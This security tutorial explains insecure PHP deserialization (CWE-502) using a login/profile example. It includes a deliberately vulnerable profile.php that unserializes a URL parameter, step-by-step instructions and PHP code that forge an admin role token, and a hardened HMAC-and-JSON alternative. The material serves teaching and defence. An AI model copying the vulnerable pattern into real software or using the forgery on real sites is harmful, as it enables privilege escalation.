Insecure Deserialization of PHP Object
CWE-502: Deserialization of Untrusted Data
User.php
<?php
// Plain data object: login.php serializes it, profile.php unserializes it
class User {
    public $username = "";
    public $role = "";

    public function displayRole() {
        echo $this->role;
    }
}
login.php
<?php
require_once 'User.php';
// $username and $role are set by the (omitted) credential check that runs before this point
$user = new User;
$user->username = $username;
$user->role = $role;
// Serialize the PHP object and base64-encode it so it fits in a URL
$data = base64_encode(serialize($user));
// Hand the serialized object to the client; it comes back in the next request unauthenticated
header('Location: profile.php?data=' . $data);
Screenshot: Access is denied for user "test"
profile.php
<?php
require_once 'User.php';
// Vulnerable: unserialize() runs directly on attacker-controlled input from the URL
$data = $_GET['data'];
$data = base64_decode($data);
$data = unserialize($data);
$username = $data->username;
$role = $data->role;
if ($role == "admin") {
    // privileged action here
}
The role is read straight out of a client-supplied object, so the authorization decision rests entirely on data the user can edit. More generally, unserialize() on untrusted input lets the client instantiate any class loaded by the application and trigger its magic methods (__wakeup, __destruct), which is why CWE-502 is treated as a code-execution risk and not only as a data-tampering one.
Exploitation steps (screenshot captions):
1. Decode the base64 value of the "data" parameter.
2. Change the role from "user" to "admin" and update the string length prefix from s:4 to s:5 (PHP serialized strings are length-prefixed, so unserialize() rejects a value whose length does not match).
3. Base64-encode the modified string and replace the "data" parameter value with it.
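The forgery above, carried through end to end and followed by one hardened alternative, as an added example that is not code from the original post. The User class matches User.php and the "data" flow matches login.php/profile.php; the token layout, the issue_token/verify_token helpers and the $SECRET value are assumptions made for the example.

```php
<?php
// Added example, not code from the original post. It walks through forging the
// base64(serialize(User)) token that login.php hands to profile.php, then shows
// one hardened alternative. The class shape matches User.php; the token layout,
// the helper names and the $SECRET value are assumptions.

class User {
    public $username = "";
    public $role = "";
}

// --- 1. What login.php emits for an ordinary user ---
$u = new User;
$u->username = "test";
$u->role = "user";
$serialized = serialize($u);
// O:4:"User":2:{s:8:"username";s:4:"test";s:4:"role";s:4:"user";}
$token = base64_encode($serialized);

// --- 2. Attacker side: decode, edit the role, fix the length prefix, re-encode ---
// Serialized strings are length-prefixed (s:<len>:"<value>"), so replacing
// "user" with "admin" also requires s:4 -> s:5, or unserialize() returns false.
$forged = str_replace(
    's:4:"role";s:4:"user";',
    's:4:"role";s:5:"admin";',
    base64_decode($token)
);
$forgedToken = base64_encode($forged);

// --- 3. profile.php's logic accepts the forged object without question ---
$obj = unserialize(base64_decode($forgedToken));
var_dump($obj instanceof User && $obj->role === "admin");

// --- 4. Hardened alternative: never call unserialize() on client input ---
// Carry plain data (not objects) as JSON, authenticate it with an HMAC under a
// server-side secret, and verify in constant time before trusting any field.
// Keeping the role in the server-side session and sending nothing in the URL
// is simpler still; this shows the pattern for when a client-held token is needed.
$SECRET = "replace-with-a-long-random-server-side-secret"; // assumption

function issue_token(string $username, string $role, string $secret): string
{
    $payload = json_encode(["username" => $username, "role" => $role]);
    $mac = hash_hmac("sha256", $payload, $secret);
    return base64_encode($payload) . "." . $mac;
}

function verify_token(string $token, string $secret): ?array
{
    $parts = explode(".", $token, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$b64, $mac] = $parts;
    $payload = base64_decode($b64, true);          // strict mode: reject stray characters
    if ($payload === false) {
        return null;
    }
    $expected = hash_hmac("sha256", $payload, $secret);
    if (!hash_equals($expected, $mac)) {            // constant-time comparison
        return null;
    }
    $data = json_decode($payload, true);            // plain array, no objects, no magic methods
    return is_array($data) ? $data : null;
}

$good = issue_token("test", "user", $SECRET);
var_dump(verify_token($good, $SECRET));

// Tamper the JSON the same way as in step 2: the MAC no longer matches.
[$b64, $mac] = explode(".", $good, 2);
$tampered = base64_encode(str_replace('"user"', '"admin"', base64_decode($b64)))
          . "." . $mac;
var_dump(verify_token($tampered, $SECRET));
```

Step 3 reproduces the page's result: the forged object deserializes cleanly and satisfies the admin check. In the hardened version the same edit to the payload invalidates the HMAC, so verify_token() returns null and the caller never sees a role it did not issue; the HMAC key must live only on the server, and json_decode() with the associative flag guarantees that no class is instantiated from client data.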